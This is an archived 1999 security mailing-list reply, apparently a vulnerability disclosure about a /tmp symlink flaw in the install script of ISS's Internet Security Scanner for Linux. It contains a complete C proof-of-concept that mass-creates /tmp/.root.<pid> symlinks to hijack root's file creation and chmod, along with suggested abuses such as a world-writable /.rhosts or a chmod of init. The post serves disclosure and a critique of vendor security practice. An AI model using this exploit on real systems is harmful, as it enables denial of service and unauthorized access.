On Sat, 20 Feb 1999, Fyodor wrote: > Today I downloade the latest trial version of Internet Security Scanner > for Linux (version 5.3). > > The install program (shell script) requires that you be root, even if you > want to install ISS in your home directory. I decided to edit the script > to comment out the root-check, and was rather shocked when I saw what they > are doing in install.iss: > > # Only root can pass the next four operations. > # Yes it's ugly - BUT IT WORKS! > touch /tmp/.root.$$ >> /dev/null 2>&1 > chmod 600 /tmp/.root.$$ >> /dev/null 2>&1 > > Obviously this is vulnerable to the standard tmp-symlink problem. And > they don't even look for the file first, so there is no need to worry > about exploiting race conditions -- just stick the 65K symlinks in /tmp > and wait for root to install ISS (you might have to wait a while ;). I've > tested that you can chmod whatever file you want to 600. This could make > for an easy DOS, but off the top of my head I don't see much more exploit > potential. One other issue that I see with this is: --- start of stupid 3xPl0i+ example #include <stdio.h> #include <string.h> #include <sys/stat.h> #include <unistd.h> #define MINPID 1 #define MAXPID 65535 int main(int argc, char **argv) { char filename[16+1]; /* Assuming MAXPID = 65535 or at least a five digit number */ struct stat buf; int i; if(argc != 2) { fprintf(stderr, "Usage: %s <file-to-create>\n", argv[0]); exit(1); } memset(filename, 0, sizeof(filename)); for(i=MINPID; i<=MAXPID; i++) { snprintf(filename, 17, "/tmp/.root.%d", i); symlink(argv[1], filename); } memset(filename, 0, sizeof(filename)); while(stat(argv[1], &buf) == -1); for(i=MINPID; i<=MAXPID; i++) { snprintf(filename, 17, "/tmp/.root.%d", i); unlink(filename); } printf("%s was created. Filemode = 0%o\n", argv[1], buf.st_mode & 0666); if(! access(argv[1], W_OK)) printf("I suppose you got lucky... (Or ran this as root.)\n"); else printf("Sorry, no write permissions for you...\n"); exit(0); } --- end of stupid 3xPl0i+ example For those who can't code, or does not see my point, if root has a stupid umask this vulnerability may be exploited to create for example a world-writeable /.rhosts (I suppose the ISS-script does not change umask to 077, since they do a chmod on the file). No matter what the umask is it could easily be made to perform a DoS-attack, what about changing the permissions on for example `which init` to 600... Anyone with a little imagination could think of other possibilities. > While this is probably not going to be exploited much (if ever), it really > concerns me that kindergarden-level security holes are still present in > current mass market **security** software. Remember that ISS chooses not > to offer us (or even paying customers!) the source code for their scanner. > So we have to trust ISS programmers are highly competent and aware of > secure coding issues. When I find problems like the one above without > even looking for them, I have to wonder whether this trust is misplaced. That is the BIG issue here. My exploit example is a possible attack, but there is still a rather small chance of it being successfully used for something else than a DoS-attack since we have to unlink the symlink before the chmod occurs, and since root must have a stupid umask... What really does disturb me, just as Fyodor, is that this really basic kind of securityhole exists in a commercial securityscanner, that is supposed to find other securityflaws on its customers systems. If I was an ISS customer I would start to worry just about, now... > Cheers, > Fyodor > > PS (shameless plug): Version 2.08 of the nmap security scanner is > available free, with source code, at http://www.insecure.org/nmap/ It's a great tool! :-) / Joel Eriksson - Systems / Security administrator, Network engineer, Programmer, UNIX Guru
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:36:47 PDT